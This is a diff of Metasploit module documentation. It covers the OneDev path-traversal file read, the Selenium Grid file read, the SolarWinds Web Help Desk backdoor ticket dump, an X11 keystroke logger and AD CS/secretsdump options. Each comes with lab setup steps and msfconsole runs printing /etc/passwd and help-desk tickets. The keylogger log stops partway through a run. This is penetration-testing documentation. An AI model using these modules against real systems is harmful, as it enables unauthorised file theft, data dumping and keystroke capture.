+[*] Auxiliary module execution completed
+
+```
@@ -9,7 +9,9 @@ along with info about which vulnerable certificate templates the certificate ser
 allows enrollment in and which SIDs are authorized to use that certificate server to
 perform this enrollment operation.

-Currently the module is capable of checking for ESC1, ESC2, and ESC3 vulnerable certificates.
+Currently the module is capable of checking for certificates that are vulnerable to ESC1, ESC2, ESC3, ESC13,
+and ESC15. The module is limited to checking for these techniques due to them being identifiable remotely from
+a normal user account by analyzing the objects in LDAP.

 ### Installing AD CS
 1. Install AD CS on either a new or existing domain controller
@@ -0,0 +1,135 @@
+## Vulnerable Application
+
+OneDev is a Git Server with CI/CD, kanban, and packages.
+This module exploits an unauthenticated arbitrary file read vulnerability (CVE-2024-45309), which affects OneDev versions <= 11.0.8.
+This vulnerability arises due to the lack of user-input sanitization of path traversal sequences `..` in the `ProjectBlobPage.java` file.
+
+To exploit this vulnerability, a valid OneDev project name is required. If anonymous access is enabled on the OneDev server, any visitor
+can view existing projects without authentication.
+However, when anonymous access is disabled, an attacker who lacks prior knowledge of existing project names can use a brute-force approach.
+By providing a user-supplied wordlist, the module may be able to guess a valid project name and subsequently exploit the vulnerability.
+
+## Installation
+
+OneDev provides docker images for a quick setup process.
+A vulnerable version (`v11.0.8`) can be found [here](https://hub.docker.com/r/1dev/server/tags?name=11.0.8).
+
+Installation instructions can be found [here](https://docs.onedev.io/).
+
+## Verification Steps
+
+1. Install the OneDev application
+2. Start msfconsole
+3. Do: `use auxiliary/gather/onedev_arbitrary_file_read`
+4. Set the `RHOSTS` and `RPORT` options as necessary
+5. Set the `TARGETFILE` option with the absolute path of the target file to read
+
+If a valid project name is known:
+
+6. Set the `PROJECT_NAME` option with the known project name
+7. Do: `run`
+8. If the file exists, the contents will be displayed to the user
+
+If there is no information about existing projects:
+
+6. Set the `PROJECT_NAMES_FILE` option with the absolute path of a wordlist that contains multiple possible values for a valid project name
+7. Do: `run`
+8. If a valid project name is found, the target file contents will be displayed to the user
+
+## Options
+
+### PROJECT_NAME
+A valid OneDev project name is required to exploit the vulnerability. If anonymous access is enabled on the OneDev server,
+any visitor can see the existing projects, and collect a valid project name. On the other hand, if anonymous access is disabled,
+the user needs to have previous knowledge of a valid project name or use the `PROJECT_NAMES_FILE` option to find one through brute force.
+
+### PROJECT_NAMES_FILE
+Absolute path of a wordlist containing multiple possible values for valid project names. Once this option is set,
+the module will verify whether a given project exists for each word.
+
+
+### TARGETFILE
+Absolute file path of the target file to be retrieved from the OneDev server. Set as `/etc/passwd` by default.
+
+### STORE_LOOT
+If set as `true`, the target file contents will be stored as loot. Set as `false` by default.
+
+
+## Scenarios
+
+### Example: Known project name or anonymous access enabled on OneDev 11.0.8
+
+```
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > set RHOSTS 192.168.1.10
+RHOSTS => 192.168.1.10
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > set RPORT 6610
+RPORT => 6610
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > set PROJECT_NAME myproject
+PROJECT_NAME => myproject
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > run
+[*] Running module against 192.168.1.10
+
+[+] Target file retrieved with success
+[*] root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
+messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
+
+[*] Auxiliary module execution completed
+
+```
+
+### Example: Unknown projects with anonymous access disabled on OneDev 11.0.8
+```
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > set RHOSTS 192.168.1.10
+RHOSTS => 192.168.1.10
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > set RPORT 6610
+RPORT => 6610
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > set PROJECT_NAMES_FILE /home/server/wordlist.txt
+PROJECT_NAMES_FILE => /home/server/wordlist.txt
+msf6 auxiliary(gather/onedev_arbitrary_file_read) > run
+[*] Running module against 192.168.1.10
+
+[*] Brute forcing valid project name ...
+[+] 192.168.1.10:6610 - Found valid OneDev project name: myproject
+[+] Target file retrieved with success
+[*] root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
+messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
+
+[*] Auxiliary module execution completed
+
+```
@@ -0,0 +1,299 @@
+## Vulnerable Application
+
+If there is an open selenium web driver, a remote attacker can send requests to the victims browser.
+In certain cases this can be used to access to the remote file system.
+
+The vulnerability affects:
+
+    * all version of open Selenium Server (Grid)
+
+This module was successfully tested on:
+
+    * selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 24.04
+    * selenium/standalone-firefox:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
+    * selenium/standalone-firefox:4.6 installed with Docker on Ubuntu 24.04
+    * selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04
+    * selenium/standalone-chrome:4.27.0 installed with Docker on Ubuntu 24.04
+    * selenium/standalone-edge:4.27.0 installed with Docker on Ubuntu 24.04
+
+
+### Installation
+
+1. `docker pull selenium/standalone-firefox:3.141.59`
+
+2. `docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-firefox:3.141.59`
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use auxiliary/gather/selenium_file_read`
+4. Do: `run rhost=<rhost>`
+5. You should get a file content
+
+
+## Options
+
+### SCHEME (Required)
+
+This is the scheme to use. Default is `file`.
+
+### FILEPATH (Required)
+
+This is the file to read. Default is `/etc/passwd`.
+
+### BROWSER (Required)
+
+This is the browser to use. Default is `firefox`.
+
+### TIMEOUT (required)
+
+This is the amount of time (in seconds) that the module will wait for the payload to be
+executed. Defaults to 75 seconds.
+
+
+## Scenarios
+### selenium/standalone-firefox:3.141.59 installed with Docker on Ubuntu 24.04
+```
+msf6 > use auxiliary/gather/selenium_file_read
+msf6 auxiliary(gather/selenium_file_read) > options
+
+Module options (auxiliary/gather/selenium_file_read):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   BROWSER   firefox          yes       The browser to use (Accepted: firefox, chrome, MicrosoftEdge)
+   FILEPATH  /etc/passwd      yes       File to read
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     4444             yes       The target port (TCP)
+   SCHEME    file             yes       The scheme to use
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   TIMEOUT   75               yes       Timeout for exploit (seconds)
+   VHOST                      no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/selenium_file_read) > run rhost=192.168.56.16 rport=4445
+[*] Running module against 192.168.56.16
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 3.141.59 detected
+[*] Started session (4a48aef3-9379-4cbe-9d6a-1ecc3176dc14).
+[+] /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+seluser:x:1200:1201::/home/seluser:/bin/bash
+systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:104:105::/nonexistent:/usr/sbin/nologin
+rtkit:x:105:106:RealtimeKit,,,:/proc:/usr/sbin/nologin
+pulse:x:106:107:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
+
+[*] Failed to delete the session (4a48aef3-9379-4cbe-9d6a-1ecc3176dc14). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
+[*] Auxiliary module execution completed
+```
+
+### selenium/standalone-firefox:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04
+```
+msf6 auxiliary(gather/selenium_file_read) > run rhost=192.168.56.16 rport=4446
+[*] Running module against 192.168.56.16
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
+[*] Started session (eb790e48-318a-4949-a7ff-8566f181a609).
+[+] /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+seluser:x:1200:1201::/home/seluser:/bin/bash
+systemd-network:x:101:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
+systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
+messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
+rtkit:x:104:105:RealtimeKit,,,:/proc:/usr/sbin/nologin
+pulse:x:105:106:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
+
+[*] Failed to delete the session (eb790e48-318a-4949-a7ff-8566f181a609). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
+[*] Auxiliary module execution completed
+```
+
+### selenium/standalone-firefox:4.6 installed with Docker on Ubuntu 24.04
+```
+msf6 auxiliary(gather/selenium_file_read) > run rhost=192.168.56.16 rport=4447
+[*] Running module against 192.168.56.16
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
+[*] Started session (2b4d313e-6e42-4c33-8bc8-630103269ef7).
+[+] /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+seluser:x:1200:1201::/home/seluser:/bin/bash
+systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:104:105::/nonexistent:/usr/sbin/nologin
+rtkit:x:105:106:RealtimeKit,,,:/proc:/usr/sbin/nologin
+pulse:x:106:107:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
+
+[*] Failed to delete the session (2b4d313e-6e42-4c33-8bc8-630103269ef7). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
+[*] Auxiliary module execution completed
+```
+
+### selenium/standalone-firefox:4.27.0 installed with Docker on Ubuntu 24.04
+```
+msf6 auxiliary(gather/selenium_file_read) > run rhost=192.168.56.16 rport=4448
+[*] Running module against 192.168.56.16
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
+[*] Started session (599a7d03-1eca-41f3-8726-3a192104dfc1).
+[+] /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
+seluser:x:1200:1201::/home/seluser:/bin/bash
+systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
+messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
+pulse:x:101:102:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
+
+[*] Failed to delete the session (599a7d03-1eca-41f3-8726-3a192104dfc1). You may need to wait for the session to expire (default: 5 minutes) or manually delete the session for the next exploit to succeed.
+[*] Auxiliary module execution completed
+```
+
+### selenium/standalone-chrome:4.27.0 installed with Docker on Ubuntu 24.04
+```
+msf6 auxiliary(gather/selenium_file_read) > run rhost=192.168.56.16 rport=4453 BROWSER=chrome
+[*] Running module against 192.168.56.16
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
+[*] Started session (363b104ba9d167f434518d3eb1add0c6).
+[+] /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
+seluser:x:1200:1201::/home/seluser:/bin/bash
+systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
+messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
+pulse:x:101:102:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
+
+[*] Deleted session (363b104ba9d167f434518d3eb1add0c6).
+[*] Auxiliary module execution completed
+```
+
+### selenium/standalone-edge:4.27.0 installed with Docker on Ubuntu 24.04
+```
+msf6 auxiliary(gather/selenium_file_read) > run rhost=192.168.56.16 rport=4454 BROWSER=MicrosoftEdge
+[*] Running module against 192.168.56.16
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Selenium Grid version 4.x detected and ready.
+[*] Started session (80c4ac70d41d4ffc5585e750c94d9ac5).
+[+] /etc/passwd
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
+seluser:x:1200:1201::/home/seluser:/bin/bash
+systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
+messagebus:x:100:101::/nonexistent:/usr/sbin/nologin
+pulse:x:101:102:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
+
+[*] Deleted session (80c4ac70d41d4ffc5585e750c94d9ac5).
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,73 @@
+## Vulnerable Application
+
+This module exploits a backdoor in SolarWinds Web Help Desk <= v12.8.3 (CVE-2024-28987) to retrieve all tickets from the system.
+
+## Testing
+
+The software can be obtained from
+[the vendor](https://downloads.solarwinds.com/solarwinds/Release/WebHelpDesk/12.8.1/WebHelpDesk-12.8.1-x64_eval.exe).
+
+Installation instructions are available [here]
+(https://documentation.solarwinds.com/en/success_center/whd/content/whd_installation_guide.htm).
+
+**Successfully tested on**
+
+- SolarWinds Web Help Desk v12.8.1 on Windows 22H2
+
+## Verification Steps
+
+1. Install and run the application
+2. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/gather/solarwinds_webhelpdesk_backdoor 
+msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > set RHOSTS <IP>
+msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > run
+```
+
+This should return all the tickets from the Web Help Desk platform.
+
+## Options
+
+### TICKET_COUNT
+The number of tickets to dump to the terminal.
+
+## Scenarios
+
+Running the exploit against Web Help Desk v12.8.1 on Windows 22H2 should result in an output similar to the following:
+
+```
+msf6 auxiliary(gather/solarwinds_webhelpdesk_backdoor) > run
+[*] Running module against 192.168.217.145
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Authenticating with the backdoor account "helpdeskIntegrationUser"...
+[+] Successfully authenticated and tickets retrieved. Displaying the first 2 tickets retrieved:
+[+] [
+  {
+    "id": 2,
+    "type": "Ticket",
+    "lastUpdated": "2024-09-25T08:54:13Z",
+    "shortSubject": "Password reset",
+    "shortDetail": "Hi,\r\n\r\nhere is your super secure password: foo\r\n\r\nYour IT Support",
+    "displayClient": "No Client",
+    "updateFlagType": 2,
+    "prettyLastUpdated": "13 hours ago",
+    "latestNote": null
+  },
+  {
+    "id": 1,
+    "type": "Ticket",
+    "lastUpdated": "2024-09-25T05:15:17Z",
+    "shortSubject": "Welcome to Web Help Desk",
+    "shortDetail": "Congratulations! You have successfully installed Web Help Desk. Further configuration options are...",
+    "displayClient": "Demo Client",
+    "updateFlagType": 2,
+    "prettyLastUpdated": "17 hours ago",
+    "latestNote": null
+  }
+]
+[+] Saved 2 tickets to /home/asdf/.msf4/loot/20240926004744_default_unknown_solarwinds_webhe_825328.txt
+[*] Auxiliary module execution completed
+```
@@ -27,7 +27,7 @@ Solino.
 ### Setup
 A privileged user is required to run this module, typically a local or domain
 Administrator. It has been tested against multiple Windows versions, from
-Windows XP/Server 2003 to Windows 10/Server version 2004.
+Windows XP/Server 2003 to Windows 10/Server version 2022.

 ## Verification Steps
 1. Start msfconsole
@@ -53,6 +53,18 @@ Windows XP/Server 2003 to Windows 10/Server version 2004.
 Use inline technique to read protected keys from the registry remotely without
 saving the hives to disk (default: true).

+### KRB_USERS
+Restrict retrieving domain information to the users or groups specified. This
+is a comma-separated list of Active Directory groups and users. This parameter
+is only utilised for domain replication (`action` set to `DOMAIN` or `ALL`).
+`set KRB_USERS "user1,user2,Domain Admins"
+
+### KRB_TYPES
+Restrict retrieving domain information to a specific type of account; either
+`USERS_ONLY` or `COMPUTERS_ONLY`, or `ALL` to retrieve all accounts. This
+parameter is only utilised for domain replication (`action` set to `DOMAIN` or
+`ALL`). It is ignored if `KRB_USERS` is also set.
+
 ## Actions

 ### ALL
@@ -0,0 +1,171 @@
+## Vulnerable Application
+
+This module binds to an open X11 host to log keystrokes. The X11 service can accept
+connections from any users when misconfigured with the command `xhost +`.
+This module is a close copy of the old xspy c program which has been on Kali for a long time.
+The module works by connecting to the X11 session, creating a background
+window, binding a keyboard to it and creating a notification alert when a key
+is pressed.
+
+One of the major limitations of xspy, and thus this module, is that it polls
+at a very fast rate, faster than a key being pressed is released (especially before
+the repeat delay is hit). To combat printing multiple characters for a single key
+press, repeat characters arent printed when typed in a very fast manor. This is also
+an imperfect keylogger in that keystrokes arent stored and forwarded but status
+displayed at poll time. Keys may be repeated or missing.
+
+### Ubuntu 10.04
+
+1. `sudo nano /etc/gdm/gdm.schemas`
+2. Find:
+
+    ```
+    <schema>
+     <key>security/DisallowTCP</key>
+     <signature>b</signature>
+     <default>true</default>
+    </schema>
+    ```
+  - Change `true` to `false`
+
+3. logout or reboot
+4. Verification: ```sudo netstat -antp | grep 6000```
+
+    ```
+    tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      1806/X
+    ```
+
+5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
+
+### Ubuntu 12.04, 14.04
+
+1. `sudo nano /etc/lightdm/lightdm.conf`
+2. Under the `[SeatDefaults]` area, add:
+
+    ```
+    xserver-allow-tcp=true
+    allow-guest=true
+    ```
+
+3. logout or reboot
+4. Verification: ```sudo netstat -antp | grep 6000```
+
+    ```        	
+    tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      1806/X
+    ```
+
+5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
+
+### Ubuntu 16.04
+
+  Use the Ubuntu 12.04 instructions, however change `SeatDefaults` to `Seat:*`
+
+### Fedora 15
+
+1. `vi /etc/gdm/custom.conf`
+2. Under the `[security]` area, add:
+
+    ```
+    DisallowTCP=false
+    ```
+
+3. logout/reboot
+4. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
+
+### Solaris 10
+
+1. `svccfg -s svc:/application/x11/x11-server setprop options/tcp_listen = true`
+2. `svc disable cde-login`
+3. `svc enable cde-login`
+4. `xhost +`
+
+### Ubuntu 22.04
+
+#### Server
+
+Getting X11 to listen on a TCP port is rather taxing, so we use socat to facilitate instead.
+
+1. `sudo apt-get install ubuntu-desktop socat` # overkill but it gets everything we need
+2. `sudo reboot` # prob a good idea since so much was installed
+3. `sudo xhost +` # must be done through gui, not through SSH
+4. `socat -d -d TCP-LISTEN:6000,fork,bind=<IP to listen to here> UNIX-CONNECT:/tmp/.X11-unix/X0`, you may need to use `X1` instead of `X0` depending on context.
+
+## Verification Steps
+
+1. Configure X11 to listen on port 6000, or use `socat` to open a socket.
+1. Start msfconsole
+1. Do: `use auxiliary/gather/x11_keyboard_spy`
+1. Do: `set rhosts [IP]`
+1. Do: `run`
+1. You should print keystrokes as they're pressed
+
+## Options
+
+### LISTENER_TIMEOUT
+
+How many seconds to keylog for.
+If set to `0`, wait forever. Defaults to `600`, 10 minutes.
+
+### PRINTERVAL
+
+The interval to print keylogs in seconds. Defaults to `60`.
+
+## Scenarios
+
+### Ubuntu 22.04
+
+```
+[*] Processing xspy.rb for ERB directives.
+resource (xspy.rb)> use auxiliary/gather/x11_keyboard_spy
+resource (xspy.rb)> set verbose true
+verbose => true
+resource (xspy.rb)> set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(gather/x11_keyboard_spy) > run
+[*] Running module against 127.0.0.1
+
+[*] 127.0.0.1:6000 - Establishing TCP Connection
+[*] 127.0.0.1:6000 - [1/9] Establishing X11 connection
+[-] 127.0.0.1:6000 - Connection packet malformed (size: 8192), attempting to get read more data
+[+] 127.0.0.1:6000 - Successfully established X11 connection
+[*] 127.0.0.1:6000 - Version: 11.0
+[*] 127.0.0.1:6000 - Screen Resolution: 958x832
+[*] 127.0.0.1:6000 - Resource ID: 33554432
+[*] 127.0.0.1:6000 - Screen root: 1320
+[*] 127.0.0.1:6000 - [2/9] Checking on BIG-REQUESTS extension
+[+] 127.0.0.1:6000 -   Extension BIG-REQUESTS is present with id 134
+[*] 127.0.0.1:6000 - [3/9] Enabling BIG-REQUESTS
+[*] 127.0.0.1:6000 - [4/9] Creating new graphical context
+[*] 127.0.0.1:6000 - [5/9] Checking on XKEYBOARD extension
+[+] 127.0.0.1:6000 -   Extension XKEYBOARD is present with id 136
+[*] 127.0.0.1:6000 - [6/9] Enabling XKEYBOARD
